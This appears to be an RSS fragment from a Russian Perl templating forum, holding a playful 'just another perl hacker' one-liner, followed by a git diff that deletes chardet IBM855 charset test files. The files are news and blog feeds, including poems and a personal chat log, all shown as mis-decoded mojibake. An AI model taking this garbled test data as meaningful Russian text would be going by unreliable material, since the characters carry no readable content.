http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - Thu, 20 Jan 2005 10:34:47 GMT - JAPH - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - perl5.8<br /><div class="code"><pre>eval qq{#line $$ &quot;just another perl hacker&quot;\ndie};$@=~/j.+r/;print$&amp;;</pre></div> - - LIOL <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-56.html - §בח¬·¨ ו¨ׂס, דכף װװס¨ ד ץ ¢׀ײװ ׂ· · Perl - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - - - diff --git a/chardet/tests/IBM855/greek.ru.xml b/chardet/tests/IBM855/greek.ru.xml deleted file mode 100644 index 2c3b268..0000000 --- a/chardet/tests/IBM855/greek.ru.xml +++ /dev/null @@ -1,59 +0,0 @@ - - - - - - Greek.Ru - ײו· כד¨ ײ ¬ב¨¨דֶײׂ װ  בחדדֶײׂ. ­ב¨₪·. ַ·״ב - http://www.greek.ru - - - - Greek.Ru - http://www.greek.ru/ru/news/ya/grekru.gif - http://www.greek.ru - 88 - 31 - - - - ­ב¨₪· ד¨¬ײ¦װ: ¡«¸ױע £׳גאזהא ה ג׳הז¸זט¥¸©¾ - http://www.greek.ru/ru/news/news_detail.php?ID=994 - ל׀ דו· ¡×·װ װ  ׀· ֶ ׂ״ װ· "״ײ ײ¬ב װ·¨װ· ״בײדו·וח₪·· · װ¨ף ֶײװװײ½  ֶו·כװײדו· ·װ¦חדוב·· ד¨ֶד ". - - - - ­ב¨₪· ד¨¬ײ¦װ: ל ­ב¨₪··  ב¨דוײכ װס ¨וכ¨בײ ¢ב·ו װ₪¨כ ף  ·ף¢·¨װ·¨ כ׀ ¦¨׀ם₪  ײ¦װײ¬ײ ·ף ׂ ¬ ף·װײכ - http://www.greek.ru/ru/news/news_detail.php?ID=996 - ל ­ב¨₪··  ב¨דוײכ װס ¨וכ¨בײ ¢ב·ו װ₪¨כ - כד¨ ׀¨װס ײ¦װײ½ ד¨ׂם·, ֶײוײבס¨ ד·׀םװײ ·ף¢·׀· כ׀ ¦¨׀ם₪  װ¨¢ײ׀םץײ¬ײ ׂ ¬ ף·װ·ֶ  ¢׀·ף "וחב·דו·¨דֶײ½ ׃¨ֶֶ·" -  ×·װדֶײ¬ײ ¡ֶבײ״ײ׀. - - - - - ַ·״ב ד¨¬ײ¦װ: זחבֶ·-ֶ·״ב·ײוס ״ב¨¦׀ ¬ ו ײדכײ¢ײ¦·ום ַ·״ב ײו ׂ·װ - http://www.greek.ru/ru/news/news_detail.php?ID=990 - ׁ·¦¨ב וחבײֶ-ֶ·״ב·ײוײכ ג ח× §¨װֶו ץ כסדֶ ף ׀ד ף  ׀·ֶכ·¦ ₪· ׂ·װװסµ ״ײ׀¨½ כ¦ײ׀ם ¦¨ׂ בֶ ₪·ײװװײ½ ׀·װ··, ב ף¦¨׀ש¨½ ײדובײכ װ  ¬ב¨¨דֶח · וחב¨₪ֶח  דו·. - - - - - ַ·״ב ד¨¬ײ¦װ: ¡זז¸ׁ¡ ױ¡ױ©ה ט§¡ג ׳ ַ¸גט 29 ׁ©ז ױ¡פ¡§ - http://www.greek.ru/ru/news/news_detail.php?ID=952 - ג¨ד״ח¢׀·ֶ  ַ·״ב · כ¨דם ¬ב¨¨דֶ·½ ׂ·ב ײוׂ¨ו·׀· 20 ·׀ וב חבװח ¦ וח דכײ¨½ ·דוײב··. גײכװײ 29 ׀¨ו װ ף ¦ כ µײ¦¨ ײ״¨ב ₪·· ָ¡וו·׀  װ  ײדובײכ כסד ¦·׀·דם וחב¨₪ֶ·¨ כײ½דֶ , וײ ״ב·כ¨׀ײ ֶ ׂ דדײכײ½ ¬·¢¨׀· װ ד¨׀¨װ· · ײֶֶח״ ₪·· ד¨כ¨בװײ½  דו· ַ·״ב . - - - - - הײ¢סו·. ה״¨ֶו ֶ׀·. לסדו כֶ·: לסדו כֶ  ָ׃ײבדֶ·¨ ״חו·׳ו ה·¦ײװ  ¦ײ ¶חק׀כס. לף ·ׂײדכף· װ בײ¦ײכ הב¨¦·ף¨ׂװײׂײבם כ 16 - 6 כ.כ. ¦ײ װ. ק. - http://www.greek.ru/ru/news/news_detail.php?ID=983 - ל ב ֶׂ µ ַח׀םוחבװײ½ ׳׀·ׂ״· ¦ס כ ¡×·װ µ, כ ׃חף¨¨ ַ·ֶ׀ ¦דֶײ¬ײ ¸דֶחדדוכ  ד 3.06.03 ״ײ 28.10.03 ״בײµײ¦·ו קו  כסדו כֶ . - - - - - הײ¢סו·. ה״¨ֶו ֶ׀·. לסדו כֶ·: ׳ז׃©ז¸ׁ 95-ׁ©ז¸© ­ג©©הַ¸¾ §¸ג¸ך©ג - http://www.greek.ru/ru/news/news_detail.php?ID=979 - ל ·׀¨ 2003 ¬ײ¦  ·ד״ײ׀װ¨וד 95 ׀¨ו ׳¦·דד¨ §·ׂ·וב· ¦· - ֶײׂ״ײף·וײבח, ¦·ב·י¨בח, װ בײ¦װײׂח  בו·דוח הההג. ©¬ײ µײבײץײ ״ײׂװו · ׀¢ו כ £ײ׀םץײׂ ו \ No newline at end of file diff --git a/chardet/tests/IBM855/intertat.ru.xml b/chardet/tests/IBM855/intertat.ru.xml deleted file mode 100644 index 1b20c5a..0000000 --- a/chardet/tests/IBM855/intertat.ru.xml +++ /dev/null @@ -1,6 +0,0 @@ - - -ג¨ד״ח¢׀·ֶ װדֶ  ק׀¨ֶובײװװ  ¬ ף¨ו  Intertat.RUטב¨¦·ו¨׀¨ׂ ¡ױ׳ גר­ Intertat.RU כ׀¨וד ֶ ¢·װ¨ו ׃·װ·דובײכ ג¨ד״ח¢׀·ֶ· ז ו בדו װ. "Intertat.RU" דײף¦ װ  ײדו װײכ׀¨װ·¨ׂ ב כ·ו¨׀םדוכ  ג¨ד״ח¢׀·ֶ· ז ו בדו װ דײ¬׀ דװײ טֶ ףח ב¨ף·¦¨װו  גז כ 2001 ¬ײ¦ח. פ ב¨¬·דוב·בײכ װײ ׃·װ·דו¨בדוכײׂ ״¨ ו· · ו¨׀¨ב ¦·ײכ¨ש װ· ג«. הכ·¦¨ו¨׀םדוכײ ײ ב¨¬·דוב ₪·· ה׃¸ ר׀ \ No newline at end of file diff --git a/chardet/tests/IBM855/janulalife.blogspot.com.xml b/chardet/tests/IBM855/janulalife.blogspot.com.xml deleted file mode 100644 index 448b823..0000000 --- a/chardet/tests/IBM855/janulalife.blogspot.com.xml +++ /dev/null @@ -1,165 +0,0 @@ - - - - - - -JaNuLa's L1FE MOMENTS -If you love Her as much as I love Her then you won't steal Her...I never know what the future brings -But I know she'll be here with me...Don't give me names -You've got it all, took it all from me -Drove me insane -Who'd come down to earth, releasing me -Healing my wounds -So why don't you close the door when you're leaving me -Now you'll run -Running all the way back to me again... -לד¨ו ֶ· ײװ ¨¨ חֶב ׀, ףװ ·ו װ¨ ׀¢·׀... - -tag:blogger.com,1999:blog-11182692 -2005-11-27T14:59:40Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -lucky - -2005-11-20T18:50:00+02:00 -2005-11-20T17:39:14Z -2005-11-20T17:39:14Z - -tag:blogger.com,1999:blog-11182692.post-113250835408580855 -¨בכס½ דװ¨¬... כ קוײׂ ¬ײ¦ח -<BODY><A HREF='http://photos1.blogger.com/blogger/7360/820/1024/collage11.jpg'><IMG SRC='http://photos1.blogger.com/blogger/7360/820/400/collage11.jpg' border=0 alt='' style='clear:all;float:left;margin: 0px 10px 10px 0px; cursor:hand'></A>&nbsp;<br /></BODY> ¨בכס½ דװ¨¬, ֶײוײבס½ ײ¢ף ו¨׀םװײ ¦ײ׀י¨װ ב דו ום. ׳ו״ב כ׀¨װװײ¨ דׂד -ױ ¦¨דם, וס ב ¦  קוײׂח ״¨בכײׂח,¢¨׀ײׂח, ·דוײׂח דװ¨¬ח :) ״ב·װ¨ד׀ײ ד דײ¢ײ½  ד ײ¢ש¨װ· ד ׀¢·ׂסׂ ¨׀ײכ¨ֶײׂ. ¶ײח ׀· כ·¦¨ום ו¨¢ כ ַב¨ׂװ¨? § , ֶײװ¨װײ, װ כ¨בװײ¨, דֶײבײ ¢ח¦ח, וײװײ. :) ז ֶ װ¨׀¨״ײ װ דוח״ ום װ  קוײו ·דוס½, ¢¨׀ס½ דװ¨יװס½ ״ײֶבײכ, װ¨ װ µײ¦·ץם? לד¨ כײֶבח¬ ף   ד דו ׀ײ ·דוסׂ · ו ֶ װ¨כ·װװסׂ...ױ ¦ײ׀¬ײ ׀·?&nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - - -lucky - -2005-11-18T21:57:00+02:00 -2005-11-18T20:04:01Z -2005-11-18T19:57:00Z - -tag:blogger.com,1999:blog-11182692.post-113234382000287438 -ב·ד׀ װײ ׂװ¨ ״ײ·ו ום... -א ףװ  ׂ·ב -- ײװ דו ב · ״ײ׀ײװ ¦בװ·,<br />א ףװ  ״ו·₪, ׀¨וש·µ װ  ׂ װײֶ,<br />א ףװ , ֶ ֶ ףכ¨װ·ו ¦¨װם¬  כ ֶ בׂ װ¨<br />¸ ֶ ֶ ףכ¨װ·ו ײווײ¨װװס½ ֶ׀·װײֶ.<br />א ףװ , ֶ ֶ ״ײו װ  קץ ×ײו¨,<br />א ףװ , ֶ ֶ ₪¨׀חו, װ¨ ׀¢,<br />א ףװ  ו¨µ, ֶוײ <<ף >> · ו¨µ, ֶוײ <<״בײו·כ>>,<br />א ףװ  כד¨, װײ וײ׀םֶײ װ¨ ד¨¢.<br /><br />א ףװ  ץ׀µ -- ײװ· ¬ײב¦ס, ֶ ֶ ¦ ׂס,<br />א ףװ  ¦ ׂ -- ײװ· ¦¨ץ¨כ׀¨ ץ׀µ,<br />א ףװ  וײ, ײ ¨ׂ ׂײ׀ ו ¬ײ¦ ׂ·,<br />א ףװ  וײ, וײ ״בײ·ףװײדו כד׀חµ,<br />א ףװ , ֶ ֶ ף¨בװײ ֶ׀ו ״ כ׀·װס<br />¸ ֶ ֶ כײבײװס ובח״ס ו¨ב¨¢ו,<br />א ףװ  י·ףװם -- ײװ  װ¨ ¢ח¦¨ו ¦׀·װװײ½,<br />א ףװ  כד¨, װײ וײ׀םֶײ װ¨ ד¨¢.<br /><br />א ףװ  ׂ·ב -- ¨¬ײ דח¦·ום ׀¨¬ֶײ װ ׂ,<br />ל¨¦ם כד¨ׂ ¦ײ דײכ¨בץ¨װדוכ  ¦ ׀¨ֶײ,<br />א ףװ , ֶ ֶ ׂײ׀ ו ״¨ב¨¦ ף ֶײװײׂ,<br />¸ ףװ , ֶ ֶ ״ײבײ½ ׂײ׀·ו ף ֶײװ.<br />א ףװ , ֶ ֶ ף  µכײדו ׀ײכ·ום ח¦ ח,<br />לד¨µ ב דוײ׀ֶ כ · ֶ י¦ײׂח ¬בח¢,<br />א ףװ  -- וײ׀םֶײ ו ֶ,   װ¨ ·װ ¨...<br />א ףװ  כד¨, װײ וײ׀םֶײ װ¨ ד¨¢.<br /><br /><br /> (ד) ׳. ׁ ¦סי¨װדֶ·½, 1998<br /><a href="http://lib.ru/OLDI/poez.txt"></a> -false - - - - -lucky - -2005-11-16T03:39:00+02:00 -2005-11-16T01:49:16Z -2005-11-16T01:49:16Z - -tag:blogger.com,1999:blog-11182692.post-113210575690319678 -ל·¦ ד ׂײ¨¬ײ ײֶװ ... -<a href="http://photos1.blogger.com/blogger/7360/820/1024/collage10.jpg"><img style="CLEAR: all; FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/7360/820/400/collage10.jpg" border="0" /></a> <br /><br />...הֶכײףם ײ״חש¨װװס¨ כ¨ֶ·<br />ל·יח, כ·יח, וס דײ ׂװײ½ -<br />¸ כ בחֶ¨ וכײ¨½ װ כ¨ֶ·<br />ױ¨ײוֶבסוס½ כ¨¨ב ׂײ½.<br /><br />׳ווײ¬ײ, וײ דו ׀· ב¦ײׂ<br />׃ס כ ¢׀ י¨װװס½ ׂ·¬ ח¦¨ד.<br />ל ׂ·¬, ֶײ¬¦  װ ¦ ׁ¨וװ·ׂ ה ¦ײׂ<br />׃¨ד₪ בײףײכס½ כײדֶב¨ד -<br /><br />׃װ¨ װ¨ װ ¦ײ ײי·¦ װ·½<br />ט ״ײדוס׀ײ¬ײ ײֶװ <br />¸ וײׂ·ו¨׀םװסµ דכ·¦ װ·½.<br />¡µ! ׀¢ײכם חוײ׀¨װ .<br /><br />זס דכײ¢ײ¦װ , דכײ¢ײ¦װ ,<br />פ כוב  ׀חץ¨, ¨ׂ כ¨ב ... <br /><br />¡.¡µׂ וײכ &nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - -lucky - -2005-11-07T19:18:35+02:00 -2005-11-07T17:18:35Z -2005-11-07T17:18:35Z - -tag:blogger.com,1999:blog-11182692.post-113138391513670714 -interesno, znaesh' li ty, gde ona seichas? -na samo... - -
    interesno, znaesh' li ty, gde ona seichas?
    na samom dele...
    -Posted by Lucky -
    -
    -false -
    - - - -lucky - -2005-10-10T01:29:46+03:00 -2005-10-09T22:29:46Z -2005-10-09T22:29:46Z - -tag:blogger.com,1999:blog-11182692.post-112889698613197046 -*** - -
    -ַ ֶ ¢ס µײו¨׀ײדם ¢סום ד וײ¢ײ½, לד„ כב¨ׂ ד׀סץ ום ¬ײ׀ײד וכײ½! ב·י ום ו¨¢ ֶ דכײ¨½ ¬בח¦·, דֶ ף ום: ?ׁ¢·ׂ , ״בײדו·!?. פ  ¬׀ח״ס¨ ד׀ײכ  · ¢ײ׀ם, ״בײדו·! פ  ¦¨ודֶ·½ דׂ¨µ · ״ײץ׀ס¨ ״ב·ףװ װ·. §ײ וח״ײדו· ח״ײבװײ¨ ׂײ׀ װ·¨. ¸ ף  ׂײ· װ·ֶ„ׂװס¨ דו ב װ·. בײדו· ף  קו· ·¦·ײודֶ·¨ דו·µ·! ¸ ף  ¦בח¬·¨, וײ ֶײ¬¦ -וײ ¢ח¦חו! בײדו· ף  װ¨דכ¨בץ„װװס¨ ¬ב¨µ·, פ  װ¨דכ¨בץ„װװײ¨ װ¨ דח¦ו! בײדו·, וײ ¨דום װ  ף¨ׂ׀¨. בײדו·! ¸, ¨ד׀· כ¦בח¬ װ¨ ¢ח¦¨ו? בײדו·, וײ ״ײׂװ ײ ו¨¢¨! בײדו·, וײ ד¨ב¦₪¨ װ¨ ף ¢ח¦¨ו!? -
    -
    -false -
    - - - - -lucky - -2005-10-07T23:22:00+03:00 -2005-10-09T22:30:22Z -2005-10-07T20:22:54Z - -tag:blogger.com,1999:blog-11182692.post-112871657428923627 -no title - -
    Xxxx (10:29 PM) :
    ¦ , · ״ב·µײ¦·וד ¦כ·¬ וםד ¦ ׀םץ¨..
    Fallen_Angel (10:30 PM) :
    ב ףכ¨ וײ ״בײדוײ ¦כ·¬ וםד (ץ·בוםד):-)
    ח ו¨¢ ¨דום כד¨...· קוײ¬ײ כד¨¬ײ װ¨ װ ¦ײ...¢¨ף
    Fallen_Angel (10:30 PM) :
    כד¨ ו ֶ ו¨ב¨ו כדֶ·½ דׂסד׀: ח ¨ׂח דוב¨ׂ·׀ד, ײ ¨ׂ ׂ¨ו ׀...
    Xxxx (10:31 PM) :
    וס ״ײו¨ב׀  ׀¢·ׂײ¬ײ ¨׀ײכ¨ֶ ?
    Fallen_Angel (10:32 PM) :
     ¬ , ח ׂ¨װ ¨¬ײ ״בײדוײ חכ¨׀·: ו ֶ ¢ װ ׀םװײ..
    ףװ ¨ץם ֶ ֶ? וח״ײ..¨ב¨ף  דםֶח... ¦ײ ד·µ ״ײב װ¨ ׂײ¬ח ״ײװום...
    Fallen_Angel (10:33 PM) :
      וײ װ¨ ׂײ¬ח ״ײװום- ״בײדוײ װ¨ ׂײ¬ח ״בײ¨µ ום, ֶ ֶ וס ¬ײכײב·ץם ¦כ·¬ וםד ¦ ׀םץ¨:
    ״בײדוײ-ד׀ײיװײ װ¨ ״ײװ·ׂ ...
    Xxxx (10:34 PM) :
    זײ¬¦  װ¨ ח¢·כ ½ד, וײו, ֶײ¬ײ ׂײיװײ חכ¨דו·, װ¨ ׂװײ¬ײ¬ײ דוײ·ו. זכײ½ ¬׀ כװס½ ׂחי·װ  י¦„ו ו¨¢ כ״¨ב¨¦·, ב ¦· װ¨¬ײ װחיװײ ·¦ו· ¦ ׀םץ¨....
    Fallen_Angel (10:34 PM) :
    ו ֶ כד¨ ״¨ב¨¨בֶװחוײ... ¢ס׀  לד¨׀¨װװײ½,
    Fallen_Angel (10:35 PM) :
    ףװ ¨ץם כ ¨ׂ ״ב·ֶײ׀...קוײ װ¨ ¢ס׀ ׂחי·װ ...
    כ¦ײµװ·....ׂװ¨ ·װו¨ב¨דװ  ב¨ ֶ₪·...:-)
    Fallen_Angel (10:36 PM) :
    קוײ ¢ס׀  ׂײ דח¦ם¢ ...
    Fallen_Angel (10:36 PM) :
    קוײ ו ֶ ףװ ....
    Fallen_Angel (10:36 PM) :
    ¢¨ף ¬ ¦ װ·½ װ כ¨בװֶ ...
    Xxxx (10:36 PM) :
    װ¨ כ יװײ..
    ױ ףײכ¨ׂ ״בײדוײ ׀¢·ׂסׂ ¨׀ײכ¨ֶײׂ
    Fallen_Angel (10:37 PM) :
    ףװ ¨ץם, וסדח ב ף ¬ײכײב·׀  ף  4 ¬ײ¦  "׀¢׀"
      ¬׀ח¢·װח דׂסד׀  ײדײףװ ׀ , וײ׀םֶײ ֶײ¬¦  ײװ  ·ד¨ף׀  ד ׂײ¨½ י·ףװ·....
    ו ֶ דוב װװײ...
    Xxxx (10:39 PM) :
    וײ¬¦  ׀¢· ¦ ׀םץ¨, ׀¢· כד¨¬¦ ,
    כ¨¦ם װ דוײש  ׀¢ײכם װ¨ וב¨¢ח¨ו װ ¬ב ¦ס · ״ײײשב¨װ·
    Fallen_Angel (10:40 PM) :
    ״¨בכס½ ¨׀ײכ¨ֶ, ֶײוײבס½ ״ײװ׀, וײ ׀¢׀ ¨¨ װ¨ דׂײוב װ· װ  וײ!
    כד¨ ¦בח¬·¨ ¬ײכײבו- ף ¢ח¦ם, װ ו· י·ףװם ף װײכײ · ו.¦.:-(
    ו ֶ דֶח  ״ײ װ¨½...
    -
    Fallen_Angel (10:41 PM) :
    ו ֶ װ¨ ׂײ¬ח ב ףׂ¨װוםד װ  ׀·₪ , כ ֶײוײבסµ װ¨ו ¨¨...
    Fallen_Angel (10:42 PM) :
    ײװ  ף ֶ ף ׀  ׂ¨װ כ ₪¨׀·ו¨׀םװ·₪ס, וײ¢ס ׂ¨װ כס׀¨·׀· ײו װ¨¨...
    Fallen_Angel (10:43 PM) :
    וײ¢ס ף ¢ס׀ , וײ¢ס ׂװ¨ װ¨ ¢ס׀ײ ו ֶ ¢ײ׀םװײ...
    Fallen_Angel (10:43 PM) :
    ײװ  װ¨ ״ײװ·ׂ ¨ו...
    Xxxx (10:43 PM) :
    ױ ש¨ו ׁ·׀·ו- קוײ ¨בװ  ׀חװ 
    א ו ֶ י¨ דֶח  ײ¢ חוב ¨װװײׂ ׂװײ½ ¨׀ײכ¨ֶ¨, װײ ׂװ¨ װ·¨¬ײ װ¨ ײדו ¨וד, ֶ ֶ וײ׀םֶײ ׂײ׀·וםד ײ װ„ׂ...
    -
    Xxxx (10:45 PM) :
    פװ ½, וײ װ·ֶ ֶ  ¢ײ׀ם װ¨ ¦׀·וםד כ¨װײ.
    Fallen_Angel (10:45 PM) :
    ףװ ¨ץם, ׂ·ב דו װײכ·וד ו ֶ ¢¨ףדׂסד׀¨װ, ¬בח¢ · װ¨כסװײד·ׂ, ֶײ¬¦  ״בײ·דµײ¦ו כ¨ש· כבײ¦¨ קו·µ...
    Fallen_Angel (10:45 PM) :
    ¢ ב װ...כ¨בװ¨¨ ו¨׀¨₪ בײי¦¨װװס½ כ ¬ײ¦ ¢סֶ ...ח ׂ¨װ קוײ חי¨ ד רכב ׀ ׂ¨ד₪ ...
    Fallen_Angel (10:47 PM) :
    ״בײדוײ ·¬ב  כ ץײח : ד ׂח ד¨¢ ד דו׀·כח װ  ׀¦µ...
    ¦ײׂײ½ כײףכב ש וםד ״בײדוײ װ¨כסװײד·ׂײ....
    Fallen_Angel (10:48 PM) :
    ײװ  ײדו כ·׀  כד¨ וײ, וײ ו ֶ ׀¢·׀ ...
    Xxxx (10:48 PM) :
    ״בײדוײ ח׀ס¢װ·דם,
    ¨ד׀· וס ׀¢·ץם, ¦ײ׀י¨װ ¢סום דכ¨ו, ׀¢כ· װ¨ ¢סכ ¨ו ¢¨ף דכ¨ו , ¦ י¨ ¨ד׀· ¢ײ׀םװײ
    Xxxx (10:49 PM) :
    · דֶ יח ו¨¢¨ װ  חץֶײ:
    להזגא¶ױ¸המ · ״¨ב¨דו װם ד¨¢ י ׀¨ום
    Fallen_Angel (10:49 PM) :
    o'k... כ ד ׂײׂ ¦¨׀¨ ח׀ס¢ דם: ב ¦  ֶ י¦ײׂח דײ׀װ¨װײׂח\¦ײי¦׀·כײׂח ¦װ...
    ׀¢ײ½ ׂ¨׀ײ·, װײ קוײ כד¨ װ¨ וײ ¢¨ף װ¨¨: ״ ב ׀׀¨׀םװײ י·כח ד ׂ  ד דײ¢ײ½... װ¨ ףװ  ֶ ֶ קוײ ײ¢םדװ·ום...
    װ·ֶוײ ד¨¢ װ¨ י ׀¨¨ו...
    Fallen_Angel (10:50 PM) :
    ח ׂ¨װ כד¨ ¨דום,  ¢דײ׀וװײ ד ׂײ¦ײדו וײװס½ ¨׀ײכ¨ֶ...ׂװ¨ װ·¨¬ײ װ¨ װ ¦ײ ¢¨ף ·ׂ¨װװײ װ¨¨...
    Xxxx (10:51 PM) :
    ¨דום ץ װד, וײ ײװ  כ¨בװ„וד?
    Fallen_Angel (10:52 PM) :
    װ¨ ףװ , ײװ  ¬ײכײב·ו, וײ ׀¢·ו ׂ¨װ. װײ חי¨ ״ײ-¦בח¬ײׂח...
    װ¨ כ¨ב װ· ¨¦·װײׂח ¨¨ ד׀ײכח...כד¨¬ײ ו ֶ ׂװײ¬ײ, וײ ׂײיװײ ״·ד ום ¢¨דוד¨׀׀¨ב...
    Fallen_Angel (10:53 PM) :
    ײװ  ״בײדוײ ד״ ׀·׀ דם. ״בײדוײ ׂײ¬׀  װ·¨¬ײ װ¨ חףװ ום, ׂײי¨ו ¢סום ײװ  ¢ס ¦ י¨ ד¨½ ד ¢ס׀  ¢ס ¦ײׂ ...
    ·װײ¬¦  ¦חׂ , דוײ·׀ײ ׀· ׂװ¨ ׀¨ףום כ ¨¨ ֶײׂ״...
    Fallen_Angel (10:53 PM) :
    כ¨בװ¨¨ כ ׂײ½, ֶײוײבסׂ ײװ  ״ײ׀םףײכ ׀ דם....
    Fallen_Angel (10:54 PM) :
    ״ײוײׂ, ײװ  ¦װׂ· ׂײי¨ו װ  ¢ב ום דײוײכס½...
    Fallen_Angel (10:55 PM) :
    ״ײוײׂ ״בײדוײ ״ײףכײװ·ום · ד״בײד·ום ֶ ֶ ח ׂ¨װ ¦¨׀ ?:-)
    Fallen_Angel (10:55 PM) :
    ׂ¨װ װ ·װ ¨ו ֶ׀·װ·ום ו ֶ, וײ װ¨ ׂײ¬ח דֶ ף ום · ד׀ײכ ...
    Fallen_Angel (10:56 PM) :
    ײװ  וײ¬¦  ח¢¨י¦ ¨וד. וײ ¨½ װ¨ דוײ·׀ײ ףכײװ·ום ....¢ב¨¦...
    µײח ¦בח¬ײ½ ¬׀ײ¢חד....
    Xxxx (10:56 PM) :
    כ ׂ װ ¦ײ ב ףײ¢ב וםד ׂ¨י¦ח דײ¢ײ½,
    ׂװ¨ ¢ײ׀םץ¨ װ¨¨¬ײ דֶ ף ום ...
    -
    Fallen_Angel (10:56 PM) :
    ״ײ ·¦¨¨ ײװ  ¢ח¦¨ו י·ום כ וכײ¨ׂ ¬ײבײ¦¨...
    Fallen_Angel (10:57 PM) :
    ׂס דוײ ב ף ב ף¢·ב ׀·דם...ײװ  ׀¢·ו װ ד ¦כײ·µ...קוײ¬ײ ֶ¡ף׀  · ׂ¨װ...
    Fallen_Angel (10:58 PM) :
    חכדוכײ כ·װס ׂ¨ץ ¨ו ¨½ כ¨בװחוםד: ײװ  ¦חׂ ¨ו, וײ ב װײ ·׀· ״ײף¦װײ ·ׂ¨װװײ ·ף=ף  קוײ¬ײ ׂס כ ·וײ¬¨ ב ףײ½¦¨ׂד...
    Fallen_Angel (10:59 PM) :
    ףװ ¨ץם, ״ײףכײװ·׀  ¨¬ײ בײ¦·ו¨׀ׂ כ ַ...
    Fallen_Angel (11:00 PM) :
    ׂװ¨ ו ֶ כ יװײ ¢ס׀ײ ףװ ום, ֶ ֶ ײװ· ײוװײדוד ֶ וײׂח, וײ ·µ דסװ "כײףי¨׀ ׀ י¨װח ¢׀·יװ¨¬ײ דכײ¨¬ײ" ףװ  ײ וײׂ, ֶ ֶ קוײו ¢׀·יװ·½ דוב ¦ ¨ו ײו קוײ¬ײ, · ףװ ¨ץם וײ?
    Fallen_Angel (11:04 PM) :
    ¨¬ײ ׂ ׂײֶ  ·ד״ח¬ ׀ דם, ״ײףכ ׀  ״ ״ײֶח, ״ ״  ד ׂ ו ׂ· ׂ¨װ ״ײד׀ ׀ · דֶ ף ׀, וײ ײװ דוײ ב ף כ׀ ף·׀ כ חי·¨ י·ףװ· · וײ׀םֶײ ¬ײב¦·וד קו·ׂ, ״ײדײכ¨וײכ ׀ ׂװ¨ ״בײוב¨ףכ¨ום, µײו װ¨ ״ם כײײ¢ש¨...װח, כ ײ¢ש¨ׂ ך¨װםֶ  כ µײבײץ·µ בחֶ µ...
    Fallen_Angel (11:04 PM) :
    קו· ׀¦· ד ׂ· ¦¨׀ ו קוײו ׂ·ב ו ֶ·ׂ װ¨כסװײד·ׂסׂ...
    -
    -false -
    - - - - -lucky - -2005-07-11T00:11:33+03:00 -2005-07-10T21:11:33Z -2005-07-10T21:11:33Z - -tag:blogger.com,1999:blog-11182692.post-112102989342403583 -ה״·דײֶ ד דו׀·כ·ֶ  - -
    ₪·װ·ףׂ -
    ק¬ײ·ףׂ -
    ד·׀םװײ¨ ח¦ײכ׀¨וכײב¨װװײ¨ י¨׀ װ·¨ ד¨ֶד  (װ¨׀¢כ·) -
     דײ₪· ׀םװײדום -
    ב¨ףׂ¨בװס¨ וב¨¢ײכ װ· ֶ ¢׀·ףֶ·ׂ -
    ײי¨דוײ„װװײ¨ ב כװײ¦חץ·¨ ֶ ײֶבחי ש·ׂ -
    µ ײו·װײדום · ״¨ב¨ׂ¨װ·כײדום ״ײ¢חי¦¨װ·½ -
    ײודחודוכ·¨ ד×ײבׂ·בײכ װװסµ ׂײב ׀םװסµ חדו װײכײֶ -
    ¢¨דד·׀םװײ¨ ¢¨ףב ף׀··¨ ֶ כסץ¨״¨ב¨·ד׀¨װװײׂח -
    -
    ַ ֶ וײ׀םֶײ כסֶ·¦סכ  ¨׀ײכ¨ֶ  ·ף דכײ¨½ י·ףװ· ...ײװ ״ײכ׀¨וד..:) -
    · כד¨ װ ·װ ¨וד דװײכ :)׃ס  דוײ ײוב¨ֶ ¨ׂד ײו ֶײ¬ײ-וײ, ײוב¨ף ¨ׂ דב ףח, ¦חׂ , וײ ו ֶ ׂ¨װםץ¨ ¢ײ׀·.׃ס ף ֶבסכ ¨ׂ ¦כ¨ב· װ ¬׀חµײ,ֶ ֶ ֶ·ב״·װ  דו¨װ  ·׀· ״סו ¨ׂד חֶ ף ום װ  װ¨¨ ֶ ֶ ¢ח¦וײ כ װ¨¨ ׂײיװײ כס½ו·. -
    ׃ס חµײ¦·ׂ · װ¨ ײ¢ײב ·כ ¨ׂד, µײו װ  ד ׂײׂ ¦¨׀¨ ¨ש„ ¦ײ׀¬ײ ׂסד׀¨װװײ ו ׂ װ µײ¦·ׂד. -
    זש¨וװײ ״סו ¨ׂד ײוײבכ וםד ײו ו¨װ·, װײ ״ײװ·ׂ ¨ׂ, וײ ײו װ¨„ װ¨ ·ף¢ כ·וםד, ׂײיװײ ׀·ץם װ¨ ײ¢ב ש ום כװ·ׂ װ· װ  װ¨„ ·׀· ״ײ½ׂ ום װײכח.. -
    ֶ ֶ ״ײװב כ·וד....בײץ׀ײ¨ ״בײדו·ום ד ״ײד׀¨¦חש·ׂ ף ¢כ¨װ·¨ׂ... -
    ·׀· -
    ױ·ֶײ¬¦  װ¨ ¢סום ״בײש¨װװסׂ.. װײ · כ¨װײ װ¨ ף ¢סוסׂ... -
